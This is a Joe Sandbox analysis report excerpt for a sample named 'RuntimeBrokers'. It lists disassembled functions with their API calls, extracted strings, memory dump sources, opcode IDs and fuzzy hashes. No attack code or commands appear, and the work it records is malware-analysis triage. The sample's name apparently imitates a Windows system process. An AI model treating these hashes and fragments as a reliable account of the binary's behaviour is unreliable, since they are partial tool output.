                                          • Part of subcall function 6C0AA8F0: memmove.VCRUNTIME140(?,?,6C0B5839,?,?,00000000,?,?,6C0B5839,?,?), ref: 6C0AA917
                                          • Part of subcall function 6C1C3AA0: __onexit.LIBCMT ref: 6C1C3AA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3___onexitmemmove
                                        • String ID: ERROR$ERROR
                                        • API String ID: 2490025381-2579291623
                                        • Opcode ID: bbc62dc98250d9be543a9effbfa8fb810d22557c078ddf11656ac8d0572c535e
                                        • Instruction ID: 3f5252dee4f49acd1ba3fe7760ddf4ce0d514cbd4b0d87431389209e4563141d
                                        • Opcode Fuzzy Hash: bbc62dc98250d9be543a9effbfa8fb810d22557c078ddf11656ac8d0572c535e
                                        • Instruction Fuzzy Hash: FEF049B1A012488FDB44DFE58481ADEBBB0AB59318F64152ED115BBBC0DB388A498F65
                                        Function 6C0A387E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0A3885
                                          • Part of subcall function 6C0AA8F0: memmove.VCRUNTIME140(?,?,6C0B5839,?,?,00000000,?,?,6C0B5839,?,?), ref: 6C0AA917
                                          • Part of subcall function 6C1C3AA0: __onexit.LIBCMT ref: 6C1C3AA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3___onexitmemmove
                                        • String ID: ILogin_mgr$ILogin_mgr
                                        • API String ID: 2490025381-4078649343
                                        • Opcode ID: efded44a078ab7e62682e5a22958a8549d4ffc7a4a22feec9fa3cd5ff4b7a4ea
                                        • Instruction ID: 9640deb6aab5f40588c74bc8b1b500f39c699813afe107d2b07e368dcd68d9ea
                                        • Opcode Fuzzy Hash: efded44a078ab7e62682e5a22958a8549d4ffc7a4a22feec9fa3cd5ff4b7a4ea
                                        • Instruction Fuzzy Hash: 76F04FB1A013499FCB40DFE5C4917DDFFB0AF59214F64142EE109ABA81D734864ACF51
                                        Function 6C0A38F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0A38FE
                                          • Part of subcall function 6C0AA8F0: memmove.VCRUNTIME140(?,?,6C0B5839,?,?,00000000,?,?,6C0B5839,?,?), ref: 6C0AA917
                                          • Part of subcall function 6C1C3AA0: __onexit.LIBCMT ref: 6C1C3AA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3___onexitmemmove
                                        • String ID: ITrack_mgr$ITrack_mgr
                                        • API String ID: 2490025381-376113704
                                        • Opcode ID: 0bb3ed363df0dcb5dd6430dd30c0fc9cda45569235477e808d625d743f8be0b3
                                        • Instruction ID: 889d58d52498c90b57f51c8d72cdcd498dde6c103ac81acec258d811a872d60b
                                        • Opcode Fuzzy Hash: 0bb3ed363df0dcb5dd6430dd30c0fc9cda45569235477e808d625d743f8be0b3
                                        • Instruction Fuzzy Hash: 34F06D71A022089FCB00DFE5C481BDDFBB0AB59214F64152FD205ABAD1DB388A4A9F55
                                        Function 6C0A39E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0A39F0
                                          • Part of subcall function 6C0AA8F0: memmove.VCRUNTIME140(?,?,6C0B5839,?,?,00000000,?,?,6C0B5839,?,?), ref: 6C0AA917
                                          • Part of subcall function 6C1C3AA0: __onexit.LIBCMT ref: 6C1C3AA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3___onexitmemmove
                                        • String ID: IDevVersion$IDevVersion
                                        • API String ID: 2490025381-4082145070
                                        • Opcode ID: 298eb3ac7c6c6ad54cb56b6ae8a0f5a7864113d1550f30cd83b70a2270647028
                                        • Instruction ID: a00f4754d1c1bd54ae08ebbccd770a0966d7254f2aa44476e4787d8d2d3547fc
                                        • Opcode Fuzzy Hash: 298eb3ac7c6c6ad54cb56b6ae8a0f5a7864113d1550f30cd83b70a2270647028
                                        • Instruction Fuzzy Hash: E0F06271E0030A9FCB10DFE58581BDDBEB0AB65214F60502DD1057BB81DB3A5689CF65
                                        Function 6C0EA2F2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C0EA2F2
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\cfg_file_model.cpp, xrefs: 6C0EA313
                                        • [cfg_file_model]get_full_cfg_path failed, xrefs: 6C0EA32A
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@H_prolog3H_prolog3_catch_Logger@1@
                                        • String ID: [cfg_file_model]get_full_cfg_path failed$d:\ci_dev\wegame_client\codes\common\src\cfg_file_model.cpp
                                        • API String ID: 750329627-4001581206
                                        • Opcode ID: 1ab943dd30c0f8d03bbff18c98fac49f95907c2af1f0abf3e65c259fca882d76
                                        • Instruction ID: 67000a0735233925d3d97c4766da49f56e2220f0d1982b60fc1b395b8ae43b9c
                                        • Opcode Fuzzy Hash: 1ab943dd30c0f8d03bbff18c98fac49f95907c2af1f0abf3e65c259fca882d76
                                        • Instruction Fuzzy Hash: F0F0A020A45610ABCA60DA648C11BCD67E18B59608F208094E1547BBC0EF3ABE0ECB81
                                        Function 004E84EE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 004E8510
                                          • Part of subcall function 004E3C2A: HeapFree.KERNEL32(00000000,00000000,?,004F080E,?,00000000,?,00000000,?,004F0B30,?,00000007,?,?,004F0EDF,?), ref: 004E3C40
                                          • Part of subcall function 004E3C2A: GetLastError.KERNEL32(?,?,004F080E,?,00000000,?,00000000,?,004F0B30,?,00000007,?,?,004F0EDF,?,?), ref: 004E3C52
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ErrorFreeHeapLast_free
                                        • String ID: LD$LD
                                        • API String ID: 1353095263-2058141247
                                        • Opcode ID: f10e7c921ae241e377ed2c3c0310114a511c19e58f143d0d4c7fa841af8d0eaf
                                        • Instruction ID: d7493f841387a7539523db475308e4d9e37369c3b9b666222a578d85a8abd8b7
                                        • Opcode Fuzzy Hash: f10e7c921ae241e377ed2c3c0310114a511c19e58f143d0d4c7fa841af8d0eaf
                                        • Instruction Fuzzy Hash: 91E06D361006059F8720CFAED400A86B7F4EF95322320892AE89DE3310DB31E912CB40
                                        Function 004484D1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Immortalize
                                        • String ID: fJD$fJD
                                        • API String ID: 3616842037-1855446239
                                        • Opcode ID: 793e63b8b83d32e4b60beed29155c4cda3f216278587282245e74bb935998aa6
                                        • Instruction ID: c293a2bf2b4d3a697f74fb483e45e00d457e500828d2d20e1bd67da22de418ce
                                        • Opcode Fuzzy Hash: 793e63b8b83d32e4b60beed29155c4cda3f216278587282245e74bb935998aa6
                                        • Instruction Fuzzy Hash: 11F0FE75A04648EFCB05CF48D840B99BBF4FB08750F00856EF825D7780C774E900CA54
                                        Function 004241A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcAddress.KERNEL32(?,ReleaseDirInfo), ref: 004241B7
                                        • FreeLibrary.KERNEL32(00000000), ref: 004241DC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: AddressFreeLibraryProc
                                        • String ID: ReleaseDirInfo
                                        • API String ID: 3013587201-831244266
                                        • Opcode ID: f3907d934ca4189f4ca053e0821acd774fdf8a01a02972881b9d258d7e321a13
                                        • Instruction ID: 276eb6d4447b57a12ca0ae068873819cd1d5c0e33a49ff8d137276e851dd9620
                                        • Opcode Fuzzy Hash: f3907d934ca4189f4ca053e0821acd774fdf8a01a02972881b9d258d7e321a13
                                        • Instruction Fuzzy Hash: 22F0D438908248AFCB01EFA4D94DBCCBFB4AF19309F04C0A5E845AA261D7B5964ADB15
                                        Function 6C15A4EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C15A4F8
                                        • SHCreateDirectoryExW.SHELL32(00000000,00000008,00000000,0000010C,6C0E9E81,?,?,?,0000018C,6C0EA607,?,?,?,?,00000000,00000200), ref: 6C15A50F
                                        Strings
                                        • create_directory_ex fail, error code:%1%, path:%2%, xrefs: 6C15A52E
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryH_prolog3_
                                        • String ID: create_directory_ex fail, error code:%1%, path:%2%
                                        • API String ID: 286309480-262898821
                                        • Opcode ID: 9f366a57d28cf608cfca5d306cd3e10d729c38881e122a4ccf4c68fd25a2f719
                                        • Instruction ID: a3eb38ef3090a11a6a1313357900854566943d733e1c21f4e6daad20b4c3402f
                                        • Opcode Fuzzy Hash: 9f366a57d28cf608cfca5d306cd3e10d729c38881e122a4ccf4c68fd25a2f719
                                        • Instruction Fuzzy Hash: 5DE04FB4651254D7EB215F218C09EFE7768EBA9B04F8044A8F53496E44CB349A898EB2
                                        Function 6C1C2DEC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C1C2E3F: memset.VCRUNTIME140(6C43A7C4,00000000,00000018,?,6C43A7B0,6C1C2DF4,?,6C0A4DD3), ref: 6C1C2E4C
                                          • Part of subcall function 6C0C6A3F: InitializeCriticalSectionAndSpinCount.KERNEL32(6C43A7C4,00000000,B33B76E5,6C43A7B0,6C0A0000,Function_00277428,000000FF,?,6C1C2E1B,?,?,?,6C0A4DD3), ref: 6C0C6A66
                                          • Part of subcall function 6C0C6A3F: GetLastError.KERNEL32(?,6C1C2E1B,?,?,?,6C0A4DD3), ref: 6C0C6A70
                                        • IsDebuggerPresent.KERNEL32(?,?,?,6C0A4DD3), ref: 6C1C2E1F
                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,6C0A4DD3), ref: 6C1C2E2E
                                        Strings
                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6C1C2E29
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinStringmemset
                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                        • API String ID: 1128651283-631824599
                                        • Opcode ID: 0a08c8120f4408fcefd609c63deacd07d3492d992b61690e40dcf83cfe495e3c
                                        • Instruction ID: 6361c66a0017b1554d99c6160a54492ed836c6d360ab3f016a3d967d1a5666e5
                                        • Opcode Fuzzy Hash: 0a08c8120f4408fcefd609c63deacd07d3492d992b61690e40dcf83cfe495e3c
                                        • Instruction Fuzzy Hash: 17E06D703013408BD730AF75D1087427BF4AB14709F40882DE48AD3B40EBB8D508CFA2
                                        Function 6C14BC6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?GetStringCharacters@common@ierd_tgp@@YAIABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?), ref: 6C14BC73
                                          • Part of subcall function 6C14BC9C: __EH_prolog3_GS.LIBCMT ref: 6C14BCA3
                                          • Part of subcall function 6C14BC9C: ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,0000001C,6C14BC78,?), ref: 6C14BCCB
                                        • ?CutStringByMaxCharacters@common@ierd_tgp@@YAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@I@Z.COMMON(?,?), ref: 6C14BC84
                                          • Part of subcall function 6C14BBE1: __EH_prolog3_GS.LIBCMT ref: 6C14BBE8
                                          • Part of subcall function 6C14BBE1: ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,?,?,0000001C), ref: 6C14BC10
                                          • Part of subcall function 6C14BBE1: ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,?,?,?,?,0000001C), ref: 6C14BC54
                                          • Part of subcall function 6C0AF830: memmove.VCRUNTIME140(?,?,00000005,?,?,00000000,?,6C0B5847,\log\,00000005,?,?), ref: 6C0AF860
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$D@2@@std@@U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$?u8to16@common@ierd_tgp@@Characters@common@ierd_tgp@@H_prolog3_StringW@2@@4@@$?u16to8@common@ierd_tgp@@D@2@@4@@D@2@@std@@@W@2@@std@@memmove
                                        • String ID: ...
                                        • API String ID: 844522834-440645147
                                        • Opcode ID: de6c15bc542a67b73f55db71e43507e732088c0011816e50b6879e074becbb26
                                        • Instruction ID: b9ed81b9646afa822a9e4c5cd007c5eb157920de51ae558c172409afc78775b1
                                        • Opcode Fuzzy Hash: de6c15bc542a67b73f55db71e43507e732088c0011816e50b6879e074becbb26
                                        • Instruction Fuzzy Hash: 08D09E3204460CBBDF055F90EC91ECD3BA9AB04668F10C015F90C4DAA0DF72E6969B94
                                        Function 6C0B7C97 Relevance: 5.2, APIs: 4, Instructions: 190COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.VCRUNTIME140(00000000,?,?,?,00000003,?,?,?,?), ref: 6C0B7D3F
                                        • memset.VCRUNTIME140(00000000,?,?,?,?,?,00000004,?,00000003,?,?,?,?), ref: 6C0B7D6F
                                        • memset.VCRUNTIME140(00000000,?,00000000,6C0B833F,?,00000000,00000003,00000003,?,?,?,?,6C0B833F,00000000,?,00000005), ref: 6C0B7DDE
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID:
                                        • API String ID: 2221118986-0
                                        • Opcode ID: fb5b9a745ffc88bbbc09174edaaf0543e3d36ac75af149cd69badec622e6d475
                                        • Instruction ID: 1c62c16f6c1bd06f59d0469112d7727665f2384de64384d5752a8689c6eff966
                                        • Opcode Fuzzy Hash: fb5b9a745ffc88bbbc09174edaaf0543e3d36ac75af149cd69badec622e6d475
                                        • Instruction Fuzzy Hash: 90514C72A00219AFCB14CFA8CD94EAF77F8AF89244B044159F955B7701E632EE15CBB1